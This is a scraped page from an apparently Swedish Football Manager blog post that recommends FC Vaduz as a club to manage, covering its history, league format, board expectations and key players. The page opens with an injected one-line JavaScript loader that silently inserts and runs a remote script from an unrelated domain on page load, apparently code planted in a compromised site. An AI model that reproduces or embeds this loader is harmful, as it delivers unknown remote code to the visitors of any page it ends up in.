;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: FC Vaduz – FMSweden
Meny Stäng

Veckans inspiration: FC Vaduz

Denna vecka blir det ett lite udda lagval i form av en klubb som spelar i ett annat lands liga. Det rör sig närmare bestämt om FC Vaduz, en klubb från Liechtenstein som spelar i Schweiz. För närvarande spelar de i högstaligan Raiffeisen Super League efter att nyligen ha tillbringat tre säsonger i andraligan. Tidigare har de varit uppe vid två tillfällen: första gången åkte de ur direkt och den andra gången tog det tre säsonger innan nedflyttningen blev ett faktum. Manager är Mario Frick, troligtvis landets bäste fotbollsspelare genom tiderna (16 mål på 125 landskamper). På ett sätt är det lite trist att behöva peta honom, men det kanske går att anställa honom i tränarstaben. Klubben grundades 1932 och spelar på nationalarenan Rheinpark Stadion med en kapacitet på cirka 7000 åskådare. För att krångla till saker lite så spelar de i den inhemska cupen, som de vunnit hela 47 (!) gånger vilket faktiskt är världsrekord. Således får de även en gratisbiljett till Europa League-kvalet, vilket förstås är trevligt för dig som manager på FM.

I den schweiziska högstaligan spelar tio lag där alla möter alla fyra gånger, vilket blir 36 matcher. Jumbon åker ner direkt medan nästjumbon får kvala mot tvåan i andraligan i ett dubbelmöte. Vinnarna, som brukar vara Young Boys eller Basel, får kvala till CL. Vaduz är, inte helt oväntat, tippade sist och du lär få en tuff uppgift att hålla dig kvar. Styrelsen vill att du satsar på inhemska spelare, får ut max av fasta situationer samt spela kontringsfotboll. Du behöver “kämpa tappert” emot nedflyttning dessutom. Nyckelspelare är bland annat vänsteryttern Coulibaly från Senegal och anfallaren Cicek från Schweiz. Åldersmässigt befinner sig många spelare i sin peak, med ett gäng unga lovande spelare på uppgång. Utmaningen ligger i att etablera sig i högstaligan, samtidigt som det förstås vore väldigt mäktigt att gå till gruppspel i Europa. Den nya turneringen Conference borde möjliggöra detta, då konkurrensen inte blir riktigt lika tuff som tidigare. Lycka till om du väljer Vaduz och skriv gärna hur det går för er i kommentarsfältet.

 

FC Vaduz logo.svg

Please wait...

Liknande Inlägg

3 kommentarer

Lämna ett svar